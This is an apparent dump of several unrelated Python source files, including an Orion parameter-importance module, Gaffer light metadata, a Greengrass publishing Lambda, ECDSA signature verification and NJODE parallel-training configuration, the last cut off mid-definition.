content
stringlengths 5
1.05M
|
|---|
import pytest
from mantisshrimp.imports import nn
@pytest.fixture(scope="module")
def simple_backbone():
    """Module-scoped fixture yielding a tiny two-conv backbone for tests."""

    class SimpleBackbone(nn.Module):
        """Minimal backbone: two stride-2 convolutions, 3 -> 8 -> 16 channels."""

        def __init__(self):
            super().__init__()
            self.c1 = nn.Conv2d(3, 8, 3, 2)
            self.c2 = nn.Conv2d(8, 16, 3, 2)
            # Consumers read this attribute to size the heads they attach.
            self.out_channels = 16

        def forward(self, x):
            features = self.c1(x)
            return self.c2(features)

    return SimpleBackbone()
|
# -*- coding: utf-8 -*-
"""
Provide tools to calculate Local Parameter Importance
=====================================================
"""
import numpy
import pandas as pd
from orion.analysis.base import flatten_numpy, to_numpy, train_regressor
from orion.core.worker.transformer import build_required_space
def make_grid(point, space, model, n_points):
    """Build a grid based on point.

    The shape of the grid will be
    (number of hyperparameters,
     number of points ``n_points``,
     number of hyperparameters + 1).
    Last column is the objective predicted by the model for a given point.

    Parameters
    ----------
    point: numpy.ndarray
        A tuple representation of the best trials, (hyperparameters + objective)
    space: Space object
        A space object from an experiment. It must be flattened and linearized.
    model: `sklearn.base.RegressorMixin`
        Trained regressor used to compute predictions on the grid
    n_points: int
        Number of points for each dimension on the grid.
    """
    n_dims = len(space)
    grid = numpy.zeros((n_dims, n_points, n_dims + 1))
    for axis, dim in enumerate(space.values()):
        # ``plane`` is a view into ``grid``; writes below fill the grid in place.
        plane = grid[axis]
        plane[:, :] = point
        # Sweep this hyperparameter across its interval, keep the others fixed.
        plane[:, axis] = numpy.linspace(*dim.interval(), num=n_points)
        # Last column: model prediction for each swept point.
        plane[:, -1] = model.predict(plane[:, :-1])
    return grid
def compute_variances(grid):
    """Return the variance of the predicted objective along each grid axis."""
    objectives = grid[..., -1]
    return objectives.var(axis=1)
def _lpi(point, space, model, n_points):
    """Return each hyperparameter's share of the total local variance."""
    variances = compute_variances(make_grid(point, space, model, n_points))
    return variances / variances.sum()
# def _linear_lpi(point, space, model, n):
#     # TODO
#     return


# Registry of supported LPI computation modes, keyed by the ``mode``
# argument of :func:`lpi` below.
modes = dict(best=_lpi)  # , linear=_linear_lpi)
def lpi(
    trials,
    space,
    mode="best",
    model="RandomForestRegressor",
    n_points=20,
    n_runs=10,
    **kwargs
):
    """
    Calculates the Local Parameter Importance for a collection of
    :class:`orion.core.worker.trial.Trial`.

    For more information on the metric, see original paper at
    https://ml.informatik.uni-freiburg.de/papers/18-LION12-CAVE.pdf.

    Biedenkapp, André, et al. "Cave: Configuration assessment, visualization and evaluation."
    International Conference on Learning and Intelligent Optimization. Springer, Cham, 2018.

    Parameters
    ----------
    trials: DataFrame or dict
        A dataframe of trials containing, at least, the columns 'objective' and 'id'. Or a dict
        equivalent.
    space: Space object
        A space object from an experiment.
    mode: str
        Mode to compute the LPI.
        - ``best``: Take the best trial found as the anchor for the LPI
        - ``linear``: Recompute LPI for all values on a grid
    model: str
        Name of the regression model to use. Can be one of
        - AdaBoostRegressor
        - BaggingRegressor
        - ExtraTreesRegressor
        - GradientBoostingRegressor
        - RandomForestRegressor (Default)
    n_points: int
        Number of points to compute the variances. Default is 20.
    n_runs: int
        Number of runs to compute the standard error of the LPI. Default is 10.
    ``**kwargs``
        Arguments for the regressor model.

    Returns
    -------
    DataFrame
        LPI value for each parameter. If ``mode`` is `linear`, then a list of
        param values and LPI metrics are returned in a DataFrame format.
    """
    # Work in a flattened, linearized, numerical version of the search space,
    # as required by make_grid / the regressor.
    flattened_space = build_required_space(
        space,
        dist_requirement="linear",
        type_requirement="numerical",
        shape_requirement="flattened",
    )
    # NOTE(review): the docstring accepts a dict for ``trials``, but ``.empty``
    # and ``.shape`` only exist on DataFrames — confirm dict inputs are
    # converted before reaching this point.
    if trials.empty or trials.shape[0] == 0:
        # No trials: every dimension gets a zero LPI.
        return pd.DataFrame(
            data=[0] * len(flattened_space),
            index=flattened_space.keys(),
            columns=["LPI"],
        )
    data = to_numpy(trials, space)
    data = flatten_numpy(data, flattened_space)
    # Anchor point: the trial with the smallest objective (last column).
    best_point = data[numpy.argmin(data[:, -1])]
    # Seed source so each of the n_runs regressor fits gets a distinct but
    # reproducible seed.
    rng = numpy.random.RandomState(kwargs.pop("random_state", None))
    results = numpy.zeros((n_runs, len(flattened_space)))
    for i in range(n_runs):
        trained_model = train_regressor(
            model, data, random_state=rng.randint(2**32 - 1), **kwargs
        )
        results[i] = modes[mode](best_point, flattened_space, trained_model, n_points)
    # Aggregate across runs: mean LPI per dimension and its spread.
    averages = results.mean(0)
    standard_errors = results.std(0)
    frame = pd.DataFrame(
        data=numpy.array([averages, standard_errors]).T,
        index=flattened_space.keys(),
        columns=["LPI", "STD"],
    )
    return frame
|
import json
import pandas as pd

# Collect subject ids from the downloaded search-result JSON dumps and append
# them to data/movieid2.csv (one append per input file, no header row).
files = [
    'jsonfile/search_subjects.json',
    'jsonfile/search_subjects (1).json',
    'jsonfile/search_subjects (2).json',
    'jsonfile/search_subjects (3).json',
]
for file in files:
    # Fix: the original opened each file without ever closing it; the context
    # manager guarantees the handle is released even on parse errors.
    with open(file, 'r', encoding='utf-8') as f:
        ps = json.load(f)
    # One id per subject entry.
    numl = [p['id'] for p in ps['subjects']]
    pd.DataFrame(numl).to_csv(
        'data/movieid2.csv', mode='a', header=False, index=True,
        encoding='utf-8')
|
##########################################################################
#
# Copyright (c) 2017, Image Engine Design Inc. All rights reserved.
#
# Redistribution and use in source and binary forms, with or without
# modification, are permitted provided that the following conditions are
# met:
#
# * Redistributions of source code must retain the above
# copyright notice, this list of conditions and the following
# disclaimer.
#
# * Redistributions in binary form must reproduce the above
# copyright notice, this list of conditions and the following
# disclaimer in the documentation and/or other materials provided with
# the distribution.
#
# * Neither the name of John Haddon nor the names of
# any other contributors to this software may be used to endorse or
# promote products derived from this software without specific prior
# written permission.
#
# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS
# IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO,
# THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR
# PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT OWNER OR
# CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL,
# EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO,
# PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR
# PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF
# LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING
# NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS
# SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
#
##########################################################################
import functools
import IECore
import Gaffer
import GafferOSL
Gaffer.Metadata.registerNode(
GafferOSL.OSLLight,
"description",
"""
Creates lights by assigning an emissive OSL shader to some simple geometry.
""",
"layout:activator:shapeHasRadius", lambda node : node["shape"].getValue() != node.Shape.Geometry,
"layout:activator:shapeIsGeometry", lambda node : node["shape"].getValue() == node.Shape.Geometry,
plugs = {
"parameters" : [
"layout:index", -1, # Move after shape parameters
],
"shaderName" : [
"description",
"""
The OSL shader to be assigned to the light
geometry.
""",
"plugValueWidget:type", "",
],
"shape" : [
"description",
"""
The shape of the light. Typically, disks
should be used with spotlight shaders and spheres
should be used with point light shaders. The "Geometry"
shape allows the use of custom geometry specific to a
particular renderer.
""",
"preset:Disk", GafferOSL.OSLLight.Shape.Disk,
"preset:Sphere", GafferOSL.OSLLight.Shape.Sphere,
"preset:Geometry", GafferOSL.OSLLight.Shape.Geometry,
"plugValueWidget:type", "GafferUI.PresetsPlugValueWidget",
],
"radius" : [
"description",
"""
The radius of the disk or sphere shape. Has no effect for
other shapes.
""",
"layout:visibilityActivator", "shapeHasRadius",
],
"geometryType" : [
"description",
"""
The type of geometry to create when shape is set
to "Geometry". This should contain the name of a geometry
type specific to the renderer being used.
""",
"layout:visibilityActivator", "shapeIsGeometry",
],
"geometryBound" : [
"description",
"""
The bounding box of the geometry. Only relevant when the
shape is set to "Geometry".
""",
"layout:visibilityActivator", "shapeIsGeometry",
],
"geometryParameters" : [
"description",
"""
Arbitary parameters which specify the features of the "Geometry"
shape type.
""",
"layout:visibilityActivator", "shapeIsGeometry",
],
"attributes" : [
"description",
"""
Arbitrary attributes which are applied to the light. Typical
uses include setting renderer specific visibility attributes
to hide the shape from the camera.
""",
"layout:section", "Settings.Attributes",
],
}
)
# Defer parameter metadata lookups to the internal shader
# node.
def __parameterMetadata( plug, key ) :

	# Look up the same metadata key on the equivalent parameter plug of the
	# internal shader node, so shader metadata surfaces on the light.
	lightNode = plug.node()
	relativeName = plug.relativeName( lightNode["parameters"] )
	shaderPlug = lightNode["__shader"]["parameters"].descendant( relativeName )
	return Gaffer.Metadata.value( shaderPlug, key )
# Forward a fixed set of metadata keys from the light's parameter plugs to the
# matching plugs on the internal shader node (via __parameterMetadata).
# Fix: "noduleLayout:label" was listed twice, registering the same deferred
# lookup redundantly; the duplicate entry is removed.
for key in [
	"description",
	"label",
	"noduleLayout:label",
	"layout:divider",
	"layout:section",
	"presetNames",
	"presetValues",
	"plugValueWidget:type",
	"nodule:type",
	"noduleLayout:visible",
] :
	Gaffer.Metadata.registerValue( GafferOSL.OSLLight, "parameters.*", key, functools.partial( __parameterMetadata, key = key ) )
|
#
# Copyright 2010-2017 Amazon.com, Inc. or its affiliates. All Rights Reserved.
#
import sys
import logging
import greengrasssdk
# Setup logging to stdout
logger = logging.getLogger(__name__)
logging.basicConfig(stream=sys.stdout, level=logging.DEBUG)
client = greengrasssdk.client('iot-data')
def uptime_handler(event, context):
    """Publish a metering message reflecting the robot arm's on/off state.

    Events without a 'state' key (or with an unrecognised state) are ignored.
    """
    logger.info("Received message!")
    if 'state' not in event:
        return
    state = event['state']
    if state == "on":
        client.publish(
            topic='/topic/metering',
            payload="Robot arm turned ON")
        logger.info("Triggering publish to topic "
                    "/topic/metering with ON state")
    elif state == "off":
        client.publish(
            topic='/topic/metering',
            payload="Robot arm turned OFF")
        logger.info("Triggering publish to topic "
                    "/topic/metering with OFF state")
|
import hashlib
import base64
import ecdsa
from connaisseur.exceptions import InvalidPublicKey
def verify_signature(public_base64: str, signature_base64: str, message: str):
    """
    Verifies the given base64-encoded signature against the base64-encoded
    public key and the serialized message. The message should not contain
    any whitespaces. Raises ValidationError if unsuccessful.
    """
    verifying_key = decode_and_verify_ecdsa_key(public_base64)
    raw_signature = base64.b64decode(signature_base64)
    payload = bytearray(message, "utf-8")
    return verifying_key.verify(raw_signature, payload, hashfunc=hashlib.sha256)
def decode_and_verify_ecdsa_key(public_base64: str):
    """
    Decodes the base64/DER-encoded public key and returns the corresponding
    ecdsa verifying key, raising InvalidPublicKey for anything malformed.
    """
    try:
        der_bytes = base64.b64decode(public_base64)
        return ecdsa.VerifyingKey.from_der(der_bytes)
    except Exception as err:
        raise InvalidPublicKey(
            f"The public key provided is not a base64-encoded ECDSA key: {err}."
        ) from err
|
"""
author: Florian Krach & Calypso Herrera
code for parallel training
"""
# =====================================================================================================================
import numpy as np
import os, sys
import pandas as pd
import json
import socket
import matplotlib
import copy
from sklearn.model_selection import ParameterGrid
from joblib import Parallel, delayed
# Optional Telegram notification support: fall back to a print-only stub when
# the telegram_notifications package is not installed.
try:
    from telegram_notifications import send_bot_message as SBM
except Exception:
    class Sbm:
        def __init__(self):
            pass

        @staticmethod
        def send_notification(text, *args, **kwargs):
            # Mirror the real bot's interface but just print locally.
            print(text)

    SBM = Sbm()

sys.path.append("../")
try:
    from . import extras as extras
except Exception:
    # Fallback for running this file as a plain script instead of a package.
    import NJODE.extras as extras


# =====================================================================================================================
# check whether running on computer or server
if 'ada-' not in socket.gethostname():
    SERVER = False
    N_JOBS = 1
    SEND = False
else:
    SERVER = True
    N_JOBS = 27
    SEND = True
print(socket.gethostname())
print('SERVER={}'.format(SERVER))

if SERVER:
    # Headless servers have no display; use a non-interactive backend.
    matplotlib.use('Agg')

# NOTE(review): duplicates the sys.path.append("../") above — confirm intended.
sys.path.append("../")
try:
    from . import data_utils as data_utils
    from . import train
    from . import climate_train
    from . import physionet_train
except Exception:
    import NJODE.data_utils as data_utils
    import NJODE.train as train
    import NJODE.climate_train as climate_train
    import NJODE.physionet_train as physionet_train

# Telegram chat that receives error notifications from parallel training.
error_chat_id = "-437994211"

DEBUG = False
# =====================================================================================================================
# Functions
def train_switcher(**params):
    """
    Dispatch to the train function matching the requested dataset, so that
    parallel training works even though different functions must be called.

    :param params: all params needed by the train function, as passed by
        parallel_training; must contain 'dataset'
    :return: result of the matching train function
    :raises KeyError: if 'dataset' is missing
    :raises ValueError: if the dataset is not supported
    """
    if 'dataset' not in params:
        raise KeyError('the "dataset" needs to be specified')
    dataset = params['dataset']
    synthetic_datasets = (
        "BlackScholes", "Heston", "OrnsteinUhlenbeck", "HestonWOFeller",
        "sine_BlackScholes", "sine_Heston", "sine_OrnsteinUhlenbeck",
    )
    if dataset in synthetic_datasets or 'combined' in dataset:
        return train.train(**params)
    if dataset in ('climate', 'Climate'):
        return climate_train.train(**params)
    if dataset in ('physionet', 'Physionet'):
        return physionet_train.train(**params)
    raise ValueError('the specified "dataset" is not supported')
def get_parameter_array(param_dict):
    """
    Expand a dict of parameter lists into all parameter combinations.

    :param param_dict: dict mapping parameter names to lists of candidate values
    :return: list of dicts, one per combination (via sklearn's ParameterGrid)
    """
    return list(ParameterGrid(param_dict))
def parallel_training(params=None, model_ids=None, nb_jobs=1, first_id=None,
                      saved_models_path=train.saved_models_path,
                      overwrite_params=None):
    """
    function for parallel training, based on train.train

    :param params: a list of param_dicts, each dict corresponding to one model
            that should be trained, can be None if model_ids is given
            (then unused)
            all kwargs needed for train.train have to be in each dict
            -> giving the params together with first_id, they can be used to
                restart parallel training (however, the saved params for all
                models where the model_id already existed will be used instead
                of the params in this list, so that no unwanted errors are
                produced by mismatching. whenever a model_id didn't exist yet
                the params of the list are used to make a new one)
            -> giving params without first_id, all param_dicts will be used to
                initiate new models
    :param model_ids: list of ints, the model ids to use (only those for which a
            model was already initiated and its description was saved to the
            model_overview.csv file will be used)
            -> used to restart parallel training of certain model_ids after the
                training was stopped
    :param nb_jobs: int, the number of CPUs to use parallelly
    :param first_id: int or None, the model_id corresponding to the first
            element of params list
    :param saved_models_path: str, path to saved models
    :param overwrite_params: None or dict with key the param name to be
            overwritten and value the new value for this param. can be used to
            continue the training of a stored model, where some params should
            be changed (e.g. the number of epochs to train longer)
    :return:
    """
    # A per-params saved_models_path takes precedence over the argument.
    if params is not None and 'saved_models_path' in params[0]:
        saved_models_path = params[0]['saved_models_path']
    model_overview_file_name = '{}model_overview.csv'.format(
        saved_models_path)
    train.makedirs(saved_models_path)
    if not os.path.exists(model_overview_file_name):
        # First run: start from an empty overview table.
        df_overview = pd.DataFrame(data=None, columns=['id', 'description'])
        max_id = 0
    else:
        df_overview = pd.read_csv(model_overview_file_name, index_col=0)
        max_id = np.max(df_overview['id'].values)

    # get model_id, model params etc. for each param
    if model_ids is None and params is None:
        return 0
    if model_ids is None:
        # Assign consecutive ids starting at first_id (or after the current max).
        if first_id is None:
            model_id = max_id + 1
        else:
            model_id = first_id
        for i, param in enumerate(params):
            if model_id in df_overview['id'].values:
                # Known model: resume with the stored description, optionally
                # overwriting selected params (and persisting the change).
                desc = (df_overview['description'].loc[
                    df_overview['id'] == model_id]).values[0]
                params_dict = json.loads(desc)
                params_dict['resume_training'] = True
                params_dict['model_id'] = model_id
                if overwrite_params:
                    for k, v in overwrite_params.items():
                        params_dict[k] = v
                    desc = json.dumps(params_dict, sort_keys=True)
                    df_overview.loc[
                        df_overview['id'] == model_id, 'description'] = desc
                    df_overview.to_csv(model_overview_file_name)
                params[i] = params_dict
            else:
                # New model: register it in the overview file before training.
                desc = json.dumps(param, sort_keys=True)
                df_ov_app = pd.DataFrame([[model_id, desc]],
                                         columns=['id', 'description'])
                df_overview = pd.concat([df_overview, df_ov_app],
                                        ignore_index=True)
                df_overview.to_csv(model_overview_file_name)
                params_dict = json.loads(desc)
                params_dict['resume_training'] = False
                params_dict['model_id'] = model_id
                params[i] = params_dict
            model_id += 1
    else:
        # Restart mode: rebuild the params list from the stored descriptions
        # of the requested model ids; unknown ids are skipped.
        params = []
        for model_id in model_ids:
            if model_id not in df_overview['id'].values:
                print("model_id={} does not exist yet -> skip".format(model_id))
            else:
                desc = (df_overview['description'].loc[
                    df_overview['id'] == model_id]).values[0]
                params_dict = json.loads(desc)
                params_dict['model_id'] = model_id
                params_dict['resume_training'] = True
                if overwrite_params:
                    for k, v in overwrite_params.items():
                        params_dict[k] = v
                    desc = json.dumps(params_dict, sort_keys=True)
                    df_overview.loc[
                        df_overview['id'] == model_id, 'description'] = desc
                    df_overview.to_csv(model_overview_file_name)
                params.append(params_dict)

    # Tell each training run it is part of a parallel batch.
    for param in params:
        param['parallel'] = True

    if SEND:
        SBM.send_notification(
            text='start parallel training - \nparams:'
                 '\n\n{}'.format(params)
        )
    if DEBUG:
        # DEBUG mode: let exceptions propagate instead of catching them below.
        results = Parallel(n_jobs=nb_jobs)(delayed(train_switcher)(**param)
                                           for param in params)
        if SEND:
            SBM.send_notification(
                text='finished parallel training - \nparams:'
                     '\n\n{}'.format(params)
            )
    else:
        try:
            results = Parallel(n_jobs=nb_jobs)(delayed(train_switcher)(**param)
                                               for param in params)
            if SEND:
                SBM.send_notification(
                    text='finished parallel training - \nparams:'
                         '\n\n{}'.format(params)
                )
        except Exception as e:
            # Report failures via Telegram on the server, stdout otherwise.
            if SEND:
                SBM.send_notification(
                    text='error in parallel training - \nerror:'
                         '\n\n{}'.format(e),
                    chat_id=error_chat_id
                )
            else:
                print('error:\n\n{}'.format(e))
if __name__ == '__main__':
    # This block only *prepares* parameter lists for the various experiments;
    # the actual parallel_training calls are commented out and enabled by hand
    # per experiment.

    # ==========================================================================
    # create dataset
    # ==========================================================================
    #dataset_dict = data_utils.hyperparam_default
    #dataset_dict['nb_paths'] = 20000
    #for dataset in ["BlackScholes", "Heston", "OrnsteinUhlenbeck"]:
    #    datasetpath, dataset_id = data_utils.create_dataset(
    #        stock_model_name=dataset, hyperparam_dict=dataset_dict)

    # ==========================================================================
    # parallel training
    # ==========================================================================
    ode_nn = ((50, 'tanh'), (50, 'tanh'))
    readout_nn = ((50, 'tanh'), (50, 'tanh'))
    enc_nn = ((50, 'tanh'), (50, 'tanh'))
    param_dict1 = {
        'epochs': [200],
        'batch_size': [200],
        'save_every': [5],
        'learning_rate': [0.001],
        'test_size': [0.2],
        'seed': [398],
        'hidden_size': [10],
        'bias': [True],
        'dropout_rate': [0.1],
        'ode_nn': [ode_nn],
        'readout_nn': [readout_nn],
        'enc_nn': [enc_nn],
        'use_rnn': [False],
        'func_appl_X': [[]],
        'solver': ["euler"],
        'weight': [0.5],
        'weight_decay': [1.],
        'dataset': ["BlackScholes", "Heston", "OrnsteinUhlenbeck"],
        'dataset_id': [None],
        'plot': [True],
        'paths_to_plot': [(0,1,2,3,4,)]
    }
    params_list1 = get_parameter_array(param_dict=param_dict1)
    # params_list = params_list1
    # print('combinations: {}'.format(len(params_list)))
    # nb_jobs = min(N_JOBS, len(params_list))
    # print('nb_jobs: {}'.format(nb_jobs))
    # parallel_training(params=params_list, model_ids=None, nb_jobs=nb_jobs,
    #                   first_id=4)

    # ==========================================================================
    # parallel training for convergence analysis
    # ==========================================================================
    # #1: define networks to train
    dataset = ["Heston"]
    path = '{}conv-study-Heston-saved_models/'.format(train.data_path)
    # dataset = ["BlackScholes"]
    # path = '{}conv-study-BS-saved_models/'.format(train.data_path)
    # dataset = ["OrnsteinUhlenbeck"]
    # path = '{}conv-study-OU-saved_models/'.format(train.data_path)
    # Training sizes 200..12800 (doubling) and network sizes 10..320 (doubling).
    training_size = [int(100 * 2 ** x) for x in np.linspace(1, 7, 7)]
    network_size = [int(5 * 2 ** x) for x in np.linspace(1, 6, 6)]
    ode_nn = [((size, 'tanh'), (size, 'tanh')) for size in network_size]
    params_list = []
    for _ode_nn in ode_nn:
        param_dict3 = {
            'epochs': [100],
            'batch_size': [20],
            'save_every': [10],
            'learning_rate': [0.001],
            'test_size': [0.2],
            'training_size': training_size,
            'seed': [398],
            'hidden_size': [10],
            'bias': [True],
            'dropout_rate': [0.1],
            'ode_nn': [_ode_nn],
            'readout_nn': [_ode_nn],
            'enc_nn': [_ode_nn],
            'use_rnn': [False],
            'func_appl_X': [[]],
            'solver': ["euler"],
            'weight': [0.5],
            'weight_decay': [1.],
            'dataset': dataset,
            'dataset_id': [None],
            'plot': [True],
            'paths_to_plot': [(0,)],
            'saved_models_path': [path],
            'evaluate': [True]
        }
        params_list3 = get_parameter_array(param_dict=param_dict3)
        params_list += params_list3
    # # #2: parallel training
    # params_list = params_list * 5  # to get variance across different trials
    # print('combinations: {}'.format(len(params_list)))
    # nb_jobs = min(N_JOBS, len(params_list))
    # print('nb_jobs: {}'.format(nb_jobs))
    # parallel_training(params=params_list, model_ids=None, nb_jobs=nb_jobs,
    #                   first_id=1, saved_models_path=path)
    #
    # # #3: plot convergence study
    # extras.plot_convergence_study(
    #     path=path,
    #     x_axis="training_size", x_log=True, y_log=True)
    # extras.plot_convergence_study(
    #     path=path,
    #     x_axis="network_size", x_log=True, y_log=True)

    # ==========================================================================
    # parallel training for GRU-ODE-Bayes
    # ==========================================================================
    # #1: define networks to train
    params_list = []
    param_dict3 = {
        'epochs': [100],
        'batch_size': [20],
        'save_every': [5],
        'learning_rate': [0.001],
        'test_size': [0.2],
        'seed': [398],
        'hidden_size': [50, 100],
        'bias': [True],
        'dropout_rate': [0.1],
        'ode_nn': [None],
        'readout_nn': [None],
        'enc_nn': [None],
        'use_rnn': [False],
        'func_appl_X': [[]],
        'solver': ["euler"],
        'weight': [0.5],
        'weight_decay': [1.],
        'dataset': ["BlackScholes", "Heston", "OrnsteinUhlenbeck"],
        'dataset_id': [None],
        'plot': [True],
        'paths_to_plot': [(0, 1, 2, 3, 4,)],
        'evaluate': [True],
        'other_model': ['GRU_ODE_Bayes'],
        'GRU_ODE_Bayes-impute': [True, False],
        'GRU_ODE_Bayes-logvar': [True, False],
        'GRU_ODE_Bayes-mixing': [0.0001, 0.5],
    }
    params_list3 = get_parameter_array(param_dict=param_dict3)
    params_list += params_list3
    # for comparison: NJ-ODE
    ode_nn = ((50, 'tanh'), (50, 'tanh'))
    param_dict4 = {
        'epochs': [100],
        'batch_size': [20],
        'save_every': [5],
        'learning_rate': [0.001],
        'test_size': [0.2],
        'seed': [398],
        'hidden_size': [10],
        'bias': [True],
        'dropout_rate': [0.1],
        'ode_nn': [ode_nn],
        'readout_nn': [ode_nn],
        'enc_nn': [ode_nn],
        'use_rnn': [False],
        'func_appl_X': [[]],
        'solver': ["euler"],
        'weight': [0.5],
        'weight_decay': [1.],
        'dataset': ["BlackScholes", "Heston", "OrnsteinUhlenbeck"],
        'dataset_id': [None],
        'plot': [True],
        'paths_to_plot': [(0, 1, 2, 3, 4,)],
        'evaluate': [True]
    }
    params_list4 = get_parameter_array(param_dict=param_dict4)
    params_list += params_list4
    # # #2: parallel training
    # print('combinations: {}'.format(len(params_list)))
    # nb_jobs = min(N_JOBS, len(params_list))
    # print('nb_jobs: {}'.format(nb_jobs))
    # parallel_training(params=params_list, model_ids=None, nb_jobs=nb_jobs,
    #                   first_id=1)

    # ==========================================================================
    # parallel training on climate dataset for cross validation
    # ==========================================================================
    params_list = []
    size = 50
    _ode_nn = ((size, 'tanh'), (size, 'tanh'))
    param_dict = {
        'epochs': [200],
        'batch_size': [100],
        'save_every': [1],
        'learning_rate': [0.001],
        'hidden_size': [10],
        'bias': [True],
        'dropout_rate': [0.1],
        'ode_nn': [_ode_nn],
        'readout_nn': [_ode_nn],
        'enc_nn': [_ode_nn],
        'use_rnn': [False],
        'solver': ["euler"],
        'weight': [0.5],
        'weight_decay': [1.],
        'dataset': ["climate"],
        'data_index': [0, 1, 2, 3, 4],
        'delta_t': [0.1]
    }
    params_list1 = get_parameter_array(param_dict=param_dict)
    params_list += params_list1
    size = 400
    _ode_nn = ((size, 'tanh'), (size, 'tanh'))
    param_dict = {
        'epochs': [200],
        'batch_size': [100],
        'save_every': [1],
        'learning_rate': [0.001],
        'hidden_size': [50],
        'bias': [True],
        'dropout_rate': [0.1],
        'ode_nn': [_ode_nn],
        'readout_nn': [_ode_nn],
        'enc_nn': [_ode_nn],
        'use_rnn': [False],
        'solver': ["euler"],
        'weight': [0.5],
        'weight_decay': [1.],
        'dataset': ["climate"],
        'data_index': [0, 1, 2, 3, 4],
        'delta_t': [0.1]
    }
    params_list1 = get_parameter_array(param_dict=param_dict)
    params_list += params_list1
    # for comparison: GRU-ODE-Bayes with suggested hyper-params
    param_dict = {
        'epochs': [50],
        'batch_size': [100],
        'save_every': [1],
        'learning_rate': [0.001],
        'hidden_size': [50],
        'bias': [True],
        'dropout_rate': [0.2],
        'ode_nn': [None],
        'readout_nn': [None],
        'enc_nn': [None],
        'use_rnn': [False],
        'solver': ["euler"],
        'weight': [0.5],
        'weight_decay': [1.],
        'dataset': ["climate"],
        'data_index': [1],
        'delta_t': [0.1],
        'other_model': ['GRU_ODE_Bayes'],
        'GRU_ODE_Bayes-impute': [False],
        'GRU_ODE_Bayes-logvar': [True],
        'GRU_ODE_Bayes-mixing': [1e-4],
        'GRU_ODE_Bayes-p_hidden': [25],
        'GRU_ODE_Bayes-prep_hidden': [10],
        'GRU_ODE_Bayes-cov_hidden': [50],
    }
    # NOTE(review): params_list2 is never appended to params_list, so the
    # GRU-ODE-Bayes comparison would not be trained — confirm intended.
    params_list2 = get_parameter_array(param_dict=param_dict)
    # # #2: parallel training
    # print('combinations: {}'.format(len(params_list)))
    # nb_jobs = min(N_JOBS, len(params_list))
    # print('nb_jobs: {}'.format(nb_jobs))
    # parallel_training(params=params_list, model_ids=None, nb_jobs=nb_jobs,
    #                   first_id=101)

    # ==========================================================================
    # parallel training for Heston without Feller
    # ==========================================================================
    # # 0: create datasets
    # dataset = 'HestonWOFeller'
    # if data_utils._get_time_id(dataset) is None:
    #     hyperparam_dict = {
    #         'drift': 2., 'volatility': 3., 'mean': 1.,
    #         'speed': 2., 'correlation': 0.5, 'nb_paths': 20000, 'nb_steps': 100,
    #         'S0': 1, 'maturity': 1., 'dimension': 1,
    #         'obs_perc': 0.1,
    #         'scheme': 'euler', 'return_vol': False, 'v0': 0.5,
    #     }
    #     data_utils.create_dataset(
    #         stock_model_name=dataset, hyperparam_dict=hyperparam_dict)
    #     hyperparam_dict['return_vol'] = True
    #     hyperparam_dict['dimension'] = 2
    #     data_utils.create_dataset(
    #         stock_model_name=dataset, hyperparam_dict=hyperparam_dict)
    # 1: load the datasets
    df_overview, filename = data_utils.get_dataset_overview()
    data_ids = []
    for index, row in df_overview.iterrows():
        if 'HestonWOFeller' in row['name']:
            data_ids.append(row['id'])
    # 2: define hyper params
    params_list = []
    ode_nn = ((50, 'tanh'), (50, 'tanh'))
    param_dict1 = {
        'epochs': [200],
        'batch_size': [100],
        'save_every': [5],
        'learning_rate': [0.001],
        'test_size': [0.2],
        'seed': [398],
        'hidden_size': [10],
        'bias': [True],
        'dropout_rate': [0.1],
        'ode_nn': [ode_nn],
        'readout_nn': [ode_nn],
        'enc_nn': [ode_nn],
        'use_rnn': [False],
        'func_appl_X': [[]],
        'solver': ["euler"],
        'weight': [0.5],
        'weight_decay': [1.],
        # NOTE(review): the line `dataset = 'HestonWOFeller'` above is
        # commented out, so `dataset` still holds the list ["Heston"] from the
        # convergence-study section and `[dataset]` nests it — confirm this
        # should be ['HestonWOFeller'].
        'dataset': [dataset],
        'dataset_id': data_ids,
        'plot': [True],
        'paths_to_plot': [(0, 1, 2, 3, 4,)],
        'evaluate': [True]
    }
    params_list1 = get_parameter_array(param_dict=param_dict1)
    params_list += params_list1
    # # #3: parallel training
    # print('combinations: {}'.format(len(params_list)))
    # nb_jobs = min(N_JOBS, len(params_list))
    # print('nb_jobs: {}'.format(nb_jobs))
    # parallel_training(params=params_list, model_ids=None, nb_jobs=nb_jobs,
    #                   first_id=1)

    # ==========================================================================
    # parallel training for Combined stock models
    # ==========================================================================
    # 1: create datasets
    combined_dataset = ["OrnsteinUhlenbeck", "BlackScholes"]
    dat_name = 'combined'
    for d in combined_dataset:
        dat_name += '_{}'.format(d)
    # # create dataset if it does not exist yet
    # if data_utils._get_time_id(dat_name) is None:
    #     print('create new combined dataset')
    #     hyperparam_dict = data_utils.hyperparam_default
    #     hyperparam_dict['nb_paths'] = 20000
    #     hyperparam_dict['nb_steps'] = 50
    #     hyperparam_dict['maturity'] = 0.5
    #     hyperparam_dict['mean'] = 10
    #     hyperparam_dicts = [hyperparam_dict] * len(combined_dataset)
    #     data_utils.create_combined_dataset(
    #         stock_model_names=combined_dataset,
    #         hyperparam_dicts=hyperparam_dicts
    #     )
    # 2: define hyper params
    params_list = []
    _ode_nn = ((100, 'tanh'), (100, 'tanh'))
    param_dict1 = {
        'epochs': [200],
        'batch_size': [100],
        'save_every': [20],
        'learning_rate': [0.001],
        'test_size': [0.2],
        'seed': [398],
        'hidden_size': [10],
        'bias': [True],
        'dropout_rate': [0.1],
        'ode_nn': [_ode_nn],
        'readout_nn': [_ode_nn],
        'enc_nn': [_ode_nn],
        'use_rnn': [False],
        'func_appl_X': [[]],
        'solver': ["euler"],
        'weight': [0.5],
        'weight_decay': [1.],
        'dataset': [dat_name],
